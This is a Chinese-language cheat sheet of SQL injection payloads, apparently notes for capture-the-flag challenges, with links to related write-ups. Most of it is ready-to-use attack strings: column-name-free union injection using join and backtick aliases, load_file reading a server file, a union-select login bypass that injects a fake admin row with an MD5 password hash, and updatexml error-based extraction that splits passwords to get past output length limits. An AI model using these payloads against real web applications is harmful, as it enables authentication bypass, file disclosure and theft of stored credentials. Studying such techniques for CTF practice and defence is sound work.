0x01利用join进行无列名注入
获取第一列的列名
?id=-1' union all select * from (select * from users as a join users b)c--+
获取次列及后续列名(using(a,b)查a,b下一个字段
?id=-1' union all select * from (select * from users as a join users b using(id,username))c--+
0x02反引号/反引号被注释无列名注入
select `4` from (select 1,2,3,4,5,6 union select * from users)a;
select b from (select 1,2,3 as b,4,5 union select * from users)a;
https://www.jianshu.com/p/dc9af4ca2d06
0x03带外注入
https://www.jianshu.com/p/19ef493da938
https://www.cnblogs.com/leixiao-/p/9876313.html
https://www.jianshu.com/p/6ea6a63dc5c8
0x04未过滤load_file
?no=0+unIon/**/select+1,load_file(’/var/www/html/flag.php’),1,1
0x05联合查询构造
发现我们在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据
所以我们在这里进行绕过,即输入admin,密码设置为123456,将123456MD5加密后放进union select 查询中
也就是当name代入查询查询时,在MySQL里面就会生成用户名为admin,密码为123456 MD5加密后的虚拟的数据,同时我们用123456密码进行登录,就能够绕过限制。
union select 1,"admin","e10adc3949ba59abbe56e057f20f883e";#
0x06回显长度限制
substr(password,0,30)
substr(password,30,30)
select(left(password,30))from(H4rDsq1)
select(right(password,30))from(H4rDsq1)
?username=adminnn%27or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))%23&password=123456